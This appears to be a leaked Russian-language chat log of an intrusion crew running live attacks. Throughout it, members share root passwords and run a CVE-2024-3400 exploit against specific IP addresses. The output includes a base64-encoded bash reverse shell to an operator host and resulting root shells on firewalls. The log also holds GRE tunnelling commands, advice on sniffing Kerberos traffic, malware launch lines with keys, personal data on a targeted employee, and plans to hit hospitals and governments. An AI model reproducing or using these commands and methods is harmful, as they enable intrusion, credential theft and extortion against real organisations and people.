[2024-05-21 17:38:46] @usernamecc:matrix.bestflowers247.online: ```
bitlaunch.io
QWedvgrdvdf@proton.me
&**%^67Vf45u
```
--------------------
[2024-05-21 17:42:24] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-05-21 в 20.42.04.png
--------------------
[2024-05-21 17:43:01] @usernamegg:matrix.bestflowers247.online: ```
[*] Waiting for incoming connection on port 34058...
[-] Failed to send POST request: HTTPSConnectionPool(host='202.55.69.146', port=443): Read timed out. (read timeout=10)
^CException ignored in: <module 'threading' from '/usr/lib/python3.9/threading.py'>
Traceback (most recent call last):
File "/usr/lib/python3.9/threading.py", line 1428, in _shutdown
```

--------------------
[2024-05-21 17:45:41] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-05-21 в 20.45.17.png
--------------------
[2024-05-21 17:45:54] @timber:matrix.bestflowers247.online: привет
--------------------
[2024-05-21 17:46:06] @timber:matrix.bestflowers247.online: + tireguru.net
--------------------
[2024-05-21 17:46:07] @timber:matrix.bestflowers247.online: revenue is $5.7 Million
--------------------
[2024-05-21 17:46:23] @timber:matrix.bestflowers247.online: по инфраструктуре вроде крупные
--------------------
[2024-05-21 17:46:53] @timber:matrix.bestflowers247.online: * `+ tireguru.net`
--------------------
[2024-05-21 17:47:15] @usernamegg:matrix.bestflowers247.online: ssh root@217.79.244.162   9Bc[L3TnC.9l8u
--------------------
[2024-05-21 17:47:21] @usernamegg:matrix.bestflowers247.online: потом cd
--------------------
[2024-05-21 17:47:24] @usernamegg:matrix.bestflowers247.online: cd CVE-2024-3400
--------------------
[2024-05-21 17:47:29] @usernamegg:matrix.bestflowers247.online: потом python3 exploit.py -u https://202.55.69.146 -lh 217.79.244.162 -lp 34058
--------------------
[2024-05-21 17:47:36] @usernamegg:matrix.bestflowers247.online: (local) pwncat$ back
(remote) root@AAM-FW01-SG:/root#
--------------------
[2024-05-21 17:48:59] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-05-21 17:49:03] @usernamegg:matrix.bestflowers247.online: сколько тачек ?
--------------------
[2024-05-21 17:49:54] @timber:matrix.bestflowers247.online: винду не искал, а серверов много. баз данных много. даже карты летят, но не найду пока как до них добраться
--------------------
[2024-05-21 17:50:13] @timber:matrix.bestflowers247.online: там кустомеров по 2-4ляма в каждой бд
--------------------
[2024-05-21 17:50:19] @usernamegg:matrix.bestflowers247.online: ты долго тут ?
--------------------
[2024-05-21 17:50:25] @timber:matrix.bestflowers247.online: да
--------------------
[2024-05-21 17:50:28] @usernamegg:matrix.bestflowers247.online: или конфеток пойдешь укладывать ?
--------------------
[2024-05-21 17:50:48] @timber:matrix.bestflowers247.online: теща приехала. без меня справляются)
--------------------
[2024-05-21 17:52:49] @usernamegg:matrix.bestflowers247.online: бро у меня сотрудник ходил искал стерлось все ищи .db файлы там логи хэш на впн
--------------------
[2024-05-21 17:52:58] @usernamegg:matrix.bestflowers247.online: остальное только сниф днс + керберы от винды
--------------------
[2024-05-21 17:53:15] @usernamegg:matrix.bestflowers247.online: есть на основе pcap, есть python реализация
--------------------
[2024-05-21 17:55:09] @usernamegg:matrix.bestflowers247.online: сначало забей back чтобы получить шелл

> список команд для поднятия тунеля подрят составить нужно
на серваке
sysctl -w net.ipv4.ip_forward=1
ip tunnel add gre1 mode gre remote ип.тар.ге.та local ип.сер.ве.ра ttl 25
ip addr add 10.0.100.1/24 dev gre1
ip link set gre1 up

на таргете
sysctl -w net.ipv4.ip_forward=1
ip tunnel add gre1 mode gre remote ип.сер.ве.ра local ип.тар.ге.та ttl 25
ip addr add 10.0.100.2/24 dev gre1
ip link set gre1 up

чтобы удалить туннель
ip tunnel del gre1

--------------------
[2024-05-21 17:56:29] @usernamegg:matrix.bestflowers247.online: таргеты по ревенью хорошие, работа на линукс поднимаем шелл потом прокидываем тунель далее берем инфу с самой этой глобал протек логин + хэш, дальше снифать керберосы от рдп и днс

--------------------
[2024-05-21 17:56:33] @usernamegg:matrix.bestflowers247.online: ставь его на линукс https://github.com/Chocapikk/CVE-2024-3400
--------------------
[2024-05-21 17:56:52] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-05-21 в 20.45.17.png
--------------------
[2024-05-21 17:56:59] @usernamegg:matrix.bestflowers247.online: python3 exploit.py -u https://202.55.69.146 -lh 217.79.244.162 -lp 34058
--------------------
[2024-05-21 17:57:09] @usernamegg:matrix.bestflowers247.online: забиваем
--------------------
[2024-05-21 17:57:13] @usernamegg:matrix.bestflowers247.online: должно выпасть
--------------------
[2024-05-21 17:57:21] @usernamegg:matrix.bestflowers247.online: [+] Vulnerable: https://202.55.69.146
/../../../../opt/panlogs/tmp/device_telemetry/minute/test`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8yMTcuNzkuMjQ0LjE2Mi8zNDA1OCAwPiYx|base64${IFS}-d|bash`
[+] Exploit request sent successfully.
[!] Exploiting telemetry, please wait some minutes...
[+] Received connection from 202.55.69.146:58305
[13:19:19] 202.55.69.146:58305: normalizing shell path            manager.py:957
[13:19:23] 202.55.69.146:58305: registered new host w/ db         manager.py:957
[+] Dropping to pwncat prompt...
(local) pwncat$
--------------------
[2024-05-21 17:57:27] @usernamegg:matrix.bestflowers247.online: (local) pwncat$ -- это оболочка
--------------------
[2024-05-21 17:57:33] @usernamegg:matrix.bestflowers247.online: забиваешь (local) pwncat$back энтер
--------------------
[2024-05-21 17:57:39] @usernamegg:matrix.bestflowers247.online: попадаешь в рутт шелла
--------------------
[2024-05-21 17:57:44] @usernamegg:matrix.bestflowers247.online: (local) pwncat$ back
(remote) root@AAM-FW01-SG:/root#
--------------------
[2024-05-21 17:57:48] @usernamegg:matrix.bestflowers247.online: там смотри в .db файлах хэши впн + ставь сниффер на сбор керберосов
--------------------
[2024-05-21 17:58:19] @usernamegg:matrix.bestflowers247.online: ___
--------------------
[2024-05-21 17:58:20] @usernamegg:matrix.bestflowers247.online: установи тунель и пингани локалку
--------------------
[2024-05-21 17:58:24] @usernamegg:matrix.bestflowers247.online: сначало забей back чтобы получить шелл
--------------------
[2024-05-21 17:58:32] @usernamegg:matrix.bestflowers247.online: > список команд для поднятия тунеля подрят составить нужно
на серваке
sysctl -w net.ipv4.ip_forward=1
ip tunnel add gre1 mode gre remote ип.тар.ге.та local ип.сер.ве.ра ttl 25
ip addr add 10.0.100.1/24 dev gre1
ip link set gre1 up

на таргете
sysctl -w net.ipv4.ip_forward=1
ip tunnel add gre1 mode gre remote ип.сер.ве.ра local ип.тар.ге.та ttl 25
ip addr add 10.0.100.2/24 dev gre1
ip link set gre1 up

чтобы удалить туннель
ip tunnel del gre1
--------------------
[2024-05-21 18:10:20] @usernameyy:matrix.bestflowers247.online: 45.32.88.233
--------------------
[2024-05-21 18:10:22] @usernameyy:matrix.bestflowers247.online: linux socks
--------------------
[2024-05-21 18:28:54] @tinker:matrix.bestflowers247.online: да я вот второй день думаю что на это отвечать
--------------------
[2024-05-21 18:28:57] @tinker:matrix.bestflowers247.online: )))
--------------------
[2024-05-21 18:29:03] @tinker:matrix.bestflowers247.online: я думал они что-то допишут ещё
--------------------
[2024-05-21 18:42:19] @muaddib6:matrix.org: > <@usernamegg:matrix.bestflowers247.online> sent a file.

Готово
--------------------
[2024-05-21 18:42:48] @muaddib6:matrix.org: regsvr32 file.dll
--------------------
[2024-05-21 18:42:50] @muaddib6:matrix.org: строка:
--------------------
[2024-05-21 18:42:52] @muaddib6:matrix.org: 2.7z
--------------------
[2024-05-21 18:43:07] @muaddib6:matrix.org: S8BZpaQtgzrWG4LyqAdKwV2ENkFMhRxPsUbXv9nDuH36jmYfC7
--------------------
[2024-05-21 18:43:30] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 18:43:41] @usernamegg:matrix.bestflowers247.online: 2.7z
--------------------
[2024-05-21 18:43:44] @usernamegg:matrix.bestflowers247.online: regsvr32 file.dll

--------------------
[2024-05-21 18:43:57] @usernamegg:matrix.bestflowers247.online: строка:
S8BZpaQtgzrWG4LyqAdKwV2ENkFMhRxPsUbXv9nDuH36jmYfC7
--------------------
[2024-05-21 18:44:02] @usernamegg:matrix.bestflowers247.online: для размножения
--------------------
[2024-05-21 18:44:13] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2024-05-21 18:44:15] @chuck:talks.icu: ага спасибо
--------------------
[2024-05-21 18:47:34] @usernamegg:matrix.bestflowers247.online: ```
proxychains ssh root@23.95.182.8
Password:  TTfgr43Fb_L3Fx^Jk82!E)_Vvcx34
```
--------------------
[2024-05-21 18:55:49] @usernamegg:matrix.bestflowers247.online: ```
shapetechnologies.com 51M usa https://www.zoominfo.com/c/shape-technologies-group-co/372066042


[+] Vulnerable: https://51.143.44.237
/../../../../opt/panlogs/tmp/device_telemetry/minute/test`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8yMTcuNzkuMjQ0LjE2Mi8zNDA1NyAwPiYx|base64${IFS}-d|bash`
[+] Exploit request sent successfully.
[!] Exploiting telemetry, please wait some minutes...
[+] Received connection from 51.143.44.237:29671
[08:27:07] 51.143.44.237:29671: normalizing shell path            manager.py:957
[08:27:08] 51.143.44.237:29671: registered new host w/ db         manager.py:957
[+] Dropping to pwncat prompt...
WARNING: your terminal doesn't support cursor position requests (CPR).
(local) pwncat$
```
--------------------
[2024-05-21 18:57:42] @nickolas:talks.icu: image.png
--------------------
[2024-05-21 18:58:15] @nickolas:talks.icu: пиздец, что бы войти в аккаунт мс, нужно войти в профиль эджа, а что бы в него войти, надо что бы у тебя еще был привязан мс ид в компе )))
--------------------
[2024-05-21 18:58:32] @nickolas:talks.icu: ох, пиздец, чем только не затыкают эндпоинты в компании
--------------------
[2024-05-21 18:59:48] @usernamegg:matrix.bestflowers247.online: видел такое, да
--------------------
[2024-05-21 18:59:56] @nickolas:talks.icu: жуть )
--------------------
[2024-05-21 18:59:57] @usernamegg:matrix.bestflowers247.online: это БАЗА
--------------------
[2024-05-21 19:00:13] @nickolas:talks.icu: не, именно на вход в аккаунт мс, впервые такое вижу
--------------------
[2024-05-21 19:00:16] @usernamegg:matrix.bestflowers247.online: в 2025 году будем крутить универы и больницы
--------------------
[2024-05-21 19:00:32] @usernamegg:matrix.bestflowers247.online: в 2026 году будем ставить gov
--------------------
[2024-05-21 19:00:45] @usernamegg:matrix.bestflowers247.online: в 2027 года снова начнем лить банки
--------------------
[2024-05-21 19:00:58] @usernamegg:matrix.bestflowers247.online: 2028 я уйду на покой ) заебался
--------------------
[2024-05-21 19:01:07] @usernamegg:matrix.bestflowers247.online: ))
--------------------
[2024-05-21 19:01:59] @usernamegg:matrix.bestflowers247.online: 2028 в конце будет 0day под .doc и я буду слать опять квак бота ))
--------------------
[2024-05-21 19:03:15] @nickolas:talks.icu: квак бот ни где не отстучит =))
--------------------
[2024-05-21 19:26:19] @burito:matrix.bestflowers247.online: @usernamegg:matrix.bestflowers247.online
rundll32.exe dll.dll,SetImage
строка gVGKDsvsSRDBjagLCttKqCQqYGURNu
--------------------
[2024-05-21 19:26:19] @burito:matrix.bestflowers247.online: scks.zip
--------------------
[2024-05-21 19:26:49] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 19:26:56] @usernamegg:matrix.bestflowers247.online: scks.zip
--------------------
[2024-05-21 19:26:59] @usernamegg:matrix.bestflowers247.online: rundll32.exe dll.dll,SetImage
строка gVGKDsvsSRDBjagLCttKqCQqYGURNu
--------------------
[2024-05-21 19:27:05] @usernamegg:matrix.bestflowers247.online: это от бурито
--------------------
[2024-05-21 19:28:21] @chuck:talks.icu: +++
--------------------
[2024-05-21 19:28:26] @chuck:talks.icu: биг сенкс
--------------------
[2024-05-21 19:34:23] @usernamegg:matrix.bestflowers247.online: позвонили ?
--------------------
[2024-05-21 19:36:43] @chuck:talks.icu: звоним
--------------------
[2024-05-21 19:37:51] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 20:05:34] @usernamegg:matrix.bestflowers247.online: я хочу скоро отдыхать идти
--------------------
[2024-05-21 20:07:23] @chuck:talks.icu: аа да давай
--------------------
[2024-05-21 20:07:25] @chuck:talks.icu: мы все
--------------------
[2024-05-21 20:07:41] @chuck:talks.icu: накосячил я сегодня(
--------------------
[2024-05-21 20:08:43] @usernamegg:matrix.bestflowers247.online: понял
--------------------
[2024-05-21 20:22:01] @nickolas:talks.icu: есть бот без кред, хочешь попробовать ?
--------------------
[2024-05-21 20:22:36] @usernamegg:matrix.bestflowers247.online: сокс рабочий
--------------------
[2024-05-21 20:22:38] @nickolas:talks.icu: ```
Jensen Hughes
www.jensenhughes.com
(410) 737-8677
3610 Commerce Dr Ste 817 Halethorpe, Maryland 21227, United States
Management Consulting, Business Services
Employees:1,001 - 5,000
$333.5M

Joshua Weilert
Projects Financial Accountant
(443) 258-9821
joshua.weilert@jensenhughes.com
Maryland

52.168.34.221:2023

user: joshua.weilert

creds: no
```

--------------------
[2024-05-21 20:22:43] @nickolas:talks.icu: да вот сокс рабочий
--------------------
[2024-05-21 20:27:03] @usernamegg:matrix.bestflowers247.online: ```
Jensen Hughes
www.jensenhughes.com
(410) 737-8677
3610 Commerce Dr Ste 817 Halethorpe, Maryland 21227, United States
Management Consulting, Business Services
Employees:1,001 - 5,000
$333.5M

Joshua Weilert
Projects Financial Accountant
(443) 258-9821
joshua.weilert@jensenhughes.com
Maryland

52.168.34.221:2023

user: joshua.weilert

creds: no
```

--------------------
[2024-05-21 20:27:10] @usernamegg:matrix.bestflowers247.online: без кред
--------------------
[2024-05-21 20:27:23] @usernamess:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> ```
> Jensen Hughes
> www.jensenhughes.com
> (410) 737-8677
> 3610 Commerce Dr Ste 817 Halethorpe, Maryland 21227, United States
> Management Consulting, Business Services
> Employees:1,001 - 5,000
> $333.5M
>
> Joshua Weilert
> Projects Financial Accountant
> (443) 258-9821
> joshua.weilert@jensenhughes.com
> Maryland
>
> 52.168.34.221:2023
>
> user: joshua.weilert
>
> creds: no
> ```

++
--------------------
[2024-05-21 20:27:58] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 20:28:12] @usernamegg:matrix.bestflowers247.online: что сегодня накосячили
--------------------
[2024-05-21 20:28:55] @usernamegg:matrix.bestflowers247.online: а где DC ?
--------------------
[2024-05-21 20:29:14] @nickolas:talks.icu: в плане накосячили ?
--------------------
[2024-05-21 20:29:19] @usernamegg:matrix.bestflowers247.online: доп инфу с cmd
--------------------
[2024-05-21 20:29:24] @nickolas:talks.icu: щас зайду на цмд гляну
--------------------
[2024-05-21 20:30:38] @usernamegg:matrix.bestflowers247.online: можно шелл
--------------------
[2024-05-21 20:30:40] @usernamegg:matrix.bestflowers247.online: я зайду
--------------------
[2024-05-21 20:31:03] @usernamegg:matrix.bestflowers247.online: когда у меня есть доступ к cmd так подручней
--------------------
[2024-05-21 20:31:31] @usernamegg:matrix.bestflowers247.online: .ppk
--------------------
[2024-05-21 20:31:46] @nickolas:talks.icu: ща
--------------------
[2024-05-21 20:31:59] @nickolas:talks.icu: сек
--------------------
[2024-05-21 20:41:45] @nickolas:talks.icu: а блин, оно отпало (
--------------------
[2024-05-21 20:41:53] @nickolas:talks.icu: да сегодня день дрянь
--------------------
[2024-05-21 20:59:41] @usernamegg:matrix.bestflowers247.online: оно отпало (
--------------------
[2024-05-21 21:09:29] @usernamess:matrix.bestflowers247.online: kflyj
--------------------
[2024-05-21 21:09:33] @usernamess:matrix.bestflowers247.online: * ладно
--------------------
[2024-05-21 21:09:35] @usernamess:matrix.bestflowers247.online: я спать
--------------------
